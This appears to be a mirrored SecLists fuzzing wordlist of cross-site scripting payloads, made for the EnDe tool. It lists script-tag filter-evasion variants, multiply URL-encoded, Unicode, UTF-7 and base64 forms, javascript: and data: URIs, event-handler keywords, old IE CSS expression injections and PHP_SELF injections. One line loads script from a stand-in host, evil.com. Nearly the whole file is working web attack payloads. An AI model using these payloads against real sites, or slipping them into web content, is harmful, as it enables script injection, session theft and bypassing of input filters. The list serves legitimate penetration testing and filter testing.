mirror of
https://github.com/danielmiessler/SecLists.git
synced 2026-07-16 14:25:01 +00:00
218 lines
7.3 KiB
Plaintext
218 lines
7.3 KiB
Plaintext
# =========================================================================== #
|
|
#?
|
|
#? NAME
|
|
#? xss-evation.txt
|
|
#?
|
|
#? SYNOPSIS
|
|
#?
|
|
#? DESCRIPTION
|
|
#? List of Cross-site Scriptings (XSS) samples.
|
|
#? Empty lines and lines starting with a # are comments and should be
|
|
#? ignored. All other lines contain one payload per line.
|
|
#?
|
|
# HACKER's INFO
|
|
# This file used in EnDe's "Load File" menu.
|
|
#?
|
|
#? VERSION
|
|
#? @(#) xss-evation.txt 1.5 13/05/12 10:51:43
|
|
#?
|
|
#? AUTHOR
|
|
#? 10-jun-10 Achim Hoffmann, mailto: EnDe (at) my (dash) stp (dot) net
|
|
#?
|
|
# =========================================================================== #
|
|
|
|
#group most-in-one pattern
|
|
"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐"',舧艠︐︑--><script>alert(42)</script>
|
|
#group general filter evasion
|
|
"'><script>alert('XSS')</script>
|
|
"'><script>alert(/XSS/)</script>
|
|
"'><script>alert(42)</script>
|
|
"'><script>prompt(42)</script>
|
|
"'><script>confirm(42)</script>
|
|
"'><sCriPt>confirm(42)</sCriPt>
|
|
"'><script >confirm(42)</script >
|
|
"'><script foo=bar>confirm(42)</script>
|
|
"'><\script>confirm(42)</script>
|
|
"'><sc\ript>confirm(42)</script>
|
|
"'><sc\tript>confirm(42)</script>
|
|
"'><script onlyOpera:-)>alert(42)
|
|
"'><script /*%00*/>/*%00*/alert(42)/*%00*/</script /*%00*/
|
|
"'><script x:href='//evil.com/onlyOpera'>
|
|
"'><///script///>alert(42)</script>
|
|
"'><///style///>alert(42)</script>
|
|
"'><;(24)trela=daolno ;''=e>'=d
|
|
"'><;(24)trela=daolno ;''=/e>'=d
|
|
"'><isindex action="javas	cript:alert(42)" type=image>
|
|
# real tab
|
|
"'><sc ript>confirm(42)</script>
|
|
# URL-encoded
|
|
"'%3e%3cscript%3econfirm(42)%3c/script%3e
|
|
"'%253e%253cscript%253econfirm(42)%253c/script%253e
|
|
"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
|
|
"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
|
|
"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
|
|
"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
|
|
%22%27%3e%3cscript%3econfirm(42)%3c/script%3e
|
|
%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e
|
|
%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e
|
|
%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e
|
|
%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e
|
|
%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e
|
|
%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e
|
|
# Unicode characters
|
|
"'><script>\u0061lert(42)</script>
|
|
"'ܾܼscriptܾalert(42)ܼܯscriptܾ
|
|
"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
|
|
"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
|
|
%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e
|
|
%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e
|
|
"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
|
|
"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
|
|
%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e
|
|
%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e
|
|
#group javascript keywords
|
|
javascript:alert(42)
|
|
javascript:prompt(42)
|
|
javascript:confirm(42)
|
|
jAvasCript:confirm(42)
|
|
jAvas\Cript:confirm(42)
|
|
jAvas Cript:confirm(42)
|
|
jAvas/* */Cript:confirm(42)
|
|
javascript:alert(42)
|
|
document
|
|
document.
|
|
top
|
|
top.
|
|
top[
|
|
eval
|
|
eval(
|
|
cookie
|
|
.cookie
|
|
#group HTML event keywords
|
|
onerror
|
|
onerror=
|
|
onclick
|
|
onclick=
|
|
onmouseover
|
|
onmouseover=
|
|
onload
|
|
onload=
|
|
"onerror
|
|
"onerror=
|
|
"onclick
|
|
"onclick=
|
|
"onmouseover
|
|
"onmouseover=
|
|
"onload
|
|
"onload=
|
|
#group HTML tag attribute keywords
|
|
href=
|
|
src=
|
|
link=
|
|
style=
|
|
alt=
|
|
title=
|
|
egal=
|
|
"href=
|
|
"src=
|
|
"link=
|
|
"style=
|
|
"alt=
|
|
"title=
|
|
"egal=
|
|
#group HTML tag keywords
|
|
<a
|
|
<a href=
|
|
<a alt=42 href=
|
|
<a href="javascript:
|
|
<a href=" javascript:
|
|
<p
|
|
<div
|
|
<iframe
|
|
<index
|
|
<layer
|
|
<link
|
|
<meta
|
|
<style
|
|
<script
|
|
<img src="/" =_=" title="onerror='alert(42)'">
|
|
<img src ?notinChrome?\/onerror = alert(42)
|
|
<img src ?notinChrome?\/onerror=alert(42)
|
|
<img/alt="/"src="/"onerror=alert(42)>
|
|
<iframe/src \/\/onload = alert(42)
|
|
<iframe/onreadystatechange=alert(42)
|
|
<!-- open comment
|
|
<!-- complete comment -->
|
|
--><!-- close/complete comment -->
|
|
<![CDATA[
|
|
<![CDATA[ open cdata
|
|
<![CDATA[ complete cdata ]]>
|
|
]]><![CDATA[ close/complete cdata ]]>
|
|
<?xml
|
|
<?xml version="1.0">
|
|
|
|
#group general IE
|
|
" value=``
|
|
onmouseover=\u0061\u006C\u0065\u0072\u0074('XSS')
|
|
onmouseover=\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
|
|
|
|
#group general IE CSS expression injection
|
|
<div style="{ left:expression( alert('XSS') ) }">
|
|
|
|
#group IE CSS expression variants
|
|
left:expr/**/ession(alert('XSS'))
|
|
left:expr/* */ession(alert('XSS'))
|
|
left:e\0078pr\0065ssion(alert('XSS'))
|
|
left:\0065\0078pr\0065ssion(alert('XSS'))
|
|
left:expr\65ssion(alert('XSS') ))
|
|
left:expr\0065ssion(alert('XSS'))
|
|
left:expression(alert('XSS'))
|
|
left:expression(alert('XSS'))
|
|
left:expression(alert('XSS'))
|
|
left:\ff45\ff58\ff50\ff52\ff45\ff53\ff53\ff49\ff4f\ff4e(alert('XSS'))
|
|
left:expression(alert('XSS'))
|
|
left:\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
|
|
#group IE CSS expression in fullwidth (same as above)
|
|
left:expression(alert('XSS'))
|
|
|
|
#group IE CSS expression in capital letters
|
|
left:EXPR/**/ESSION(alert('XSS'))
|
|
left:EXPR/* */ESSION(alert('XSS'))
|
|
left:\ff25\ff38\ff30\ff32\ff42\ff53\ff33\ff29\ff2f\ff2e(alert('XSS'))
|
|
left:EXPRbsSION(alert('XSS'))
|
|
left:EXPRESSION(alert('XSS'))
|
|
|
|
#group IE CSS expression with foreign Unicode letters
|
|
left:exp\0280essio\0274(alert('XSS'))
|
|
left:exp\0280essio\207f(alert('XSS'))
|
|
left:expʀessioɴ(alert('XSS'))
|
|
left:expʀessioⁿ(alert('XSS'))
|
|
# see http://openmya.hacker.jp/hasegawa/security/expression.txt also
|
|
|
|
#group Unicode Left/Right Pointing Double Angel Quotation Mark
|
|
# improved pattern from: http://jeremiahgrossman.blogspot.com/2009/06/results-unicode-leftright-pointing.html
|
|
%u00ABscript%u00BB
|
|
〈script〉
|
|
U%2bFF1CscriptU%2bFF1E
|
|
‹script›
|
|
〈script〉
|
|
⟨script⟩
|
|
|
|
#group data: URL
|
|
href="data:text/html;charset=utf-8,%3cscript%3econfirm(42);%3c/script%3e" UTF-8 URL-encoded
|
|
href="data:text/html;charset=utf-8,%3c%73%63%72%69%70%74%3e%63%6f%6e%66%69%72%6d%28%34%32%29%3b%3c%2f%73%63%72%69%70%74%3e" UTF-8 URL-encoded (all)
|
|
href="data:text/html;base64,PHNjcmlwdD5jb25maXJtKDQyKTs8L3NjcmlwdD4=" base64
|
|
href="data:text/html;charset=utf-7,+ADw-script+AD4-confirm(42)+ADsAPA-/script+AD4-" UTF-7
|
|
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAOwBoAGkAcwB0AG8AcgB5AC4AYgBhAGMAawAoACkAOwA8AC8AcwBjAHIAaQBwAHQAPgAKADwAcwBjAHIAaQBwAHQAPgBjAG8AbgBmAGkAcgBtACgANAAyACkAOwA8AC8AcwBjAHIAaQBwAHQAPg-" UTF-7 (all)
|
|
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPg-confirm(42)+ADsAPA-/script+AD4-" UTF-7/UTF-8 mix
|
|
href="data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=" UTF-7 in base64
|
|
href="data: text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=">obfuscated UTF-7 in base64
|
|
href="data:text/html;base64;charset=utf-7,+AFAASABOAGoAYwBtAGwAdwBkAEQANQBqAGIAMgA1AG0AYQBYAEoAdABLAEQAUQB5AEsAVABzADgATAAzAE4AagBjAG0AbAB3AGQARAA0AD0-" base64 in UTF-7
|
|
|
|
|
|
#group PHP
|
|
# use of $_SERVER['PHP_SELF']
|
|
%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
|
|
%20%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
|
|
<%<!--'%><script>alert(42);</script -->
|